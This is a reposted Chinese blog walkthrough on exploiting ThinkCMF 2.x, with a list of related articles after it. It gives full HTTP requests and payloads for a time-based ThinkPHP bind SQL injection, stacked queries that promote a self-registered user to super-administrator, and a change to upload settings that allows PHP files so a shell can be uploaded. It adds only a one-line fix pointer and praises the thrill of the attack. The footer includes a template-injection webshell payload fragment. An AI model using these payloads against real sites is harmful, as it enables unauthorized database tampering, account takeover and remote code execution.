mysql注入攻击getshell_[漏洞案例]thinkcmf 2.x从sql注入到getshell实战

最新推荐文章于 2024-01-09 16:41:41 发布
最新推荐文章于 2024-01-09 16:41:41 发布
阅读量362 收藏
点赞数
文章标签: mysql注入攻击getshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30856775/article/details/113614815
版权

文章中提到了三个漏洞,一个注入,两个模板注入写shell。

但是系统是部署在linux下面的,模板注入是不行的。

所以文章编辑处的sql注入漏洞是比较好的方法了。

但是这里的注入需要登陆。

虽然网站默认关闭了注册,登陆等前端页面展示。

但其实后端的逻辑是没有关闭的。

所以我们只要抓到注册,登陆的URL就可以注册一个用户,从而利用SQL注入漏洞了。

第一步:注册用户

因为注册用户需要用到验证码,请求验证码的URL为

fe1ef51aa594e84288c2aa75b8766deb.png

下面是注册请求包,把验证码放到verify参数里面

POST /index.php?g=user&m=register&a=doregister HTTP/1.1

Host: xx.target.com

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.9

Cookie: _ga=GA1.3.247321242.1547113529; _gid=GA1.3.1692231506.1547113529; Hm_lvt_fd3ebc39e3d20d958cc417964a1a070f=1547114908; GmZMlN_think_language=zh-CN; PHPSESSID=rca5i9uik29o378crgi37c0v61spvn88; _gat=1

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

email=r00tuser@email.com&password=xxxxxxx&repassword=xxxxxxx&verify=8486

b365db7a77723700c07cc7eef7cfb044.png

成功注册了个用户。

第二步:登陆

同样登陆也需要验证码,同样用上面请求的URL获取一个验证码,填写在verify参数里面

请求包如下:

0a1b22b611f93914ae7d9bae7f852c25.png

第三步:注入

因为thinkcmf是用thinkphp 3.2.3的,存在bind 注入,原理就不多解释了,可以参考先知喵呜写的tp安全总结。

请求包如下:

POST /index.php?g=Portal&m=Article&a=edit_post HTTP/1.1

Host: xx.target.com

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.9

Cookie: _ga=GA1.3.247321242.1547113529; _gid=GA1.3.1692231506.1547113529; Hm_lvt_fd3ebc39e3d20d958cc417964a1a070f=1547114908; GmZMlN_think_language=zh-CN; PHPSESSID=rca5i9uik29o378crgi37c0v61spvn88; _gat=1

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 184

post[post_title]=122&post[post_content]=1&term=123&post[post_title]=aaa&post_title=123&post[id][0]=bind&post[id][1]=0 and if(ascii(substr(user(),1,1))=115,benchmark(1000000,sha(1)),1)

由于程序关闭了报错,而且这里是update类型注入,所以这里只能用延时注入。

payload:and if(ascii(substr(user(),1,1))=115,benchmark(1000000,sha(1)),1)

意思为猜测当前数据库用户的首位字符的ascii码。

正常请求,返回时间为64。

09a02f777ecf2bf9393ea68c69e469e6.png

当猜测ascii码为116时,返回时间为417。

f0027cac54f656e7487f3b767ed5cd94.png

因为thinkphp 底层用的是pdo所写,所以我们是可以执行多语句的。

通过一番延时注入猜测到表前缀为xxxx,表结构大多数不会变,所以我们只要猜测到表前缀即可,通过thinkcmf的源码来注入了。

下面通过注入执行多语句从而将前台用户r00tuse@email.com提升为后台管理员。

首先是注入,设置用户的user_type。

payload:;update `xxxxx_users` set user_type=1 where `user_email`=r00tuse@email.com';

7c682d7bf9279f6444922cfb60783aef.png

这里还有一步是通过注入获取r00tuser@email.com这个用户的user_id。

payload:and if((select id from xxxx_users where user_email='r00tuser@email.com')=6,benchmark(1000000,sha(1)),1)

bfd54e2e3c0c01acfc3fe2f023823e9f.png

用户user_id为6。

接着是修改用户角色为超级管理员。

payload:;INSERT INTO `xxxx_role_user`(`role_id`,`user_id`)values(1,6);

902609bd39d179bf4f3e673138f9a3e4.png

第四步:登陆后台,修改上传配置

用户名:r00tuser@email.com 密码:xxxxxxxxxx

成功登陆:

3364cb69c072a418a25a3ce8800fb90f.png

修改上传设置,添加上传文件后缀php

http://xx.target.com/index.php?g=Admin&m=Setting&a=upload

a48c1820dd2fe6a6391e43eb18ad1ef1.png

最后一步,找一个可以上传图片的地方,直接把php文件上传即可。

13a700a9bf20ff6ab1f7ac9155c75beb.png

点击图片,直接选择xx.php 即可。

请求包如下,只是打印Hello,World。

6b2b9e77aceb7bf85e0756d5f3b7af77.png

在返回包中获取到php存放地址。

1f6e179cb41b8413ac66ba7c4449a76b.png

cc1f8ef9df23322fd25ac7bdbc2c71ed.png

成功getshell。

修复建议:

1):在底层think_filter方法添加bind过滤。具体为

文件地址:simplewind\Core\Mode\Api\functions.php

e8b9b444e7f476d7bcdb32e14c75ac22.png

0x02 说在最后

pdo让很多注入到getshell成为了可能,从注入到getshell一套下来,整个感受就一个字,爽!

AeroD
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
组件攻击ThinkCMF高危漏洞分析与利用1
08-03
1.1 基本信息 1.2 版本介绍 1.3 使量及使分布 3.1 ThinkCMFX 2.x GetShell 3.2 ThinkCMF 5.x GetShel
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1262
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
thinkcmf 代码执行 (CVE-2019-7580) 漏洞复现
YouthBelief的博客
05-10 2454
所有文章,仅供安全研究与学习之用,后果自负! thinkcmf 代码执行 CVE-2019-7580thinkcmf 代码执行 (CVE-2019-7580)0x01 漏洞描述0x02 影响范围0x03 漏洞复现3.1 登录后台3.2 漏洞利用3.2.1webshell3.2 phpinfo3.3 获取系统命令0x04 漏洞修复 thinkcmf 代码执行 (CVE-2019-7580) 复现小心会搞崩环境。 0x01 漏洞描述 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于Thi
文件上传另类GETshell方法
SwBack的博客
03-02 711
利用.user.ini 进行解析文件。 不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以; 什么是.user.ini 先看下官方的废话。 简单来讲,第一段话,反过来就是.htaccess 在特定的情况下和.user.ini作用相同。而.htaccess 利用相信大家都不陌生。 第二句话就是字面意思了。简单讲就是后面利用的时候,你这个.user.ini在任何目录下都无所谓,php会去找到它的。 .user.ini就相当于php.ini的意思了。 第三句就是条件
自动化部署 MySQL Shell脚本
01-04
MySQL Shell脚本是一种高效的方法,用于自动化MySQL数据库的部署、管理及维护任务。在IT行业中,尤其是在运维领域,自动化是提升效率和减少错误的关键。本文将深入探讨如何使用Shell脚本来实现MySQL的自动化部署。 ...
MySQL5.7安装过程并重置root密码的方法(shell 脚本)
09-09
首先,你需要从MySQL官方网站下载适用于你系统的rpm包。例如,如果你使用的是RHEL/CentOS 6.x系统,可以使用以下命令下载: ```bash wget ...
shell一键安装MySQL5.7.38
08-02
2. 安装MySQL服务器:`sudo apt-get install mysql-server` (Ubuntu) 或 `sudo yum install mysql-community-server` (CentOS)。 **密码修改:** 安装过程中,系统会提示设置MySQL root用户的密码。若错过了这个...
Mysql+linux安装日志.rar_MYSQL_historyxrl_linux
09-21
2. **查询日志**: 记录所有客户端发送到MySQL服务器的查询,适用于监控。 添加或修改`general_log_file`和`general_log`: ``` general_log_file = /var/log/mysql/query.log general_log = 1 ``` 3. **慢查询...
[漏洞分析]thinkcmf 1.6.0版本从sql注入到任意代码执行
weixin_30660027的博客
11-23 141
0x00 前言 该漏洞源于某真实案例,虽然攻击没有用到该漏洞,但在分析攻击之后对该版本的cmf审计之后发现了,也算是有点机遇巧合的味道,我没去找漏洞漏洞找上了我XD thinkcmf 已经非常久远了,该版本看github上的更新时间已经是4年前了,也就是2014年的时候,那时候我没学安全呢。。。 0x01 前台sql注入 前台在登录方法中存在注入thinkcmf是基于t...
学习笔记-ThinkPHP5漏洞分析之SQL注入(四)
人饭子的博客
11-09 1095
ThinkPHP5漏洞分析之SQL注入(四) 本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 。 不同版本 payload 需稍作调整: 5.0.0~5...
ThinkCMF X2.2.2多处SQL注入漏洞分析
weixin_33924770的博客
12-21 1767
  1.     漏洞描述 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本。最近刚好在渗透测试项目中遇到这个CMS,便审了下源码发现多处SQL注入漏洞,在Github给项目方提issues后,提交到CVE官方后很快就拿到了分配的多个编号:CVE-2018-19894、CVE-2018...
【网络安全---sql注入(2)】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。
m0_67844671的博客
10-01 2045
sql注入】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件,读取文件。通过SQL输入来注入木马来getshell等,讲解了比较详细的过程;
ThinkCMF框架任意内容包含漏洞-实战
帅醉了的博客
10-12 520
漏洞影响版本: ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 ThinkCMF X2.2.3 1、phpinfo版payload如下: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<
%3c?php+eval,ThinkCMF缓存Getshell漏洞
weixin_39901412的博客
03-23 201
由于thinkcmf2.x使用了thinkphp3.x作为开发框架,默认情况下启用了报错日志并且开启了模板缓存,导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中,再次包含该日志文件即可在网站根目录下生成一句话木马m.php日志文件格式为YY_MM_DD.log,如当前日期为2019年12月12日,日志文件为19_12_...
漏洞复现】宏景ehr-hcm-khfieldtree-sql注入
最新发布
知黑而守白
01-09 463
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 khfieldtree 接口处,该功能存在SQL注入漏洞攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
渗透测试|sql注入Getshell的几种方式
jennycisp的博客
11-03 1575
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell。
【1day】复现宏景HCM codesettree SQL注入漏洞(CNVD-2023-08743)
记录并分享学习安全的知识点..
07-26 1225
北京宏景世纪软件股份有限公司 HCM codesettree 接口存在SQL注入漏洞攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息。
基于SQL注入漏洞读写文件Getshell技巧
道阻且长,行则将至。
06-28 1939
文章目录前言手工注入靶场环境into outfileSQLMap靶场环境--os-shell读写文件总结 前言 在 HW 行动和攻防演练过程中,获得 Shell 的方式总结起来大概是以下几种(当然了如果能够通过源码泄露审计出 0day 的大佬的姿势另说……): 暴力破解+弱口令/未授权访问漏洞登录后台,任意文件上传漏洞 Getshell; Shiro、Struts2、Fastjson 等反序列化漏洞导致 RCE; 通过 SQL 注入漏洞写入木马文件并 Getshell…… 在前面一篇文章:渗透测试-Ph
请详细说明如何发现系统存在SQL注入漏洞,如何对其进行利用实现Get Shell
05-13
SQL注入漏洞是一种常见的Web安全漏洞攻击者可以利用该漏洞来获取敏感信息或者执行恶意操作,例如获取Shell。下面是发现系统存在SQL注入漏洞的一般步骤: 1. 找到一个可注入的参数,例如一个搜索框或者登录表单中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值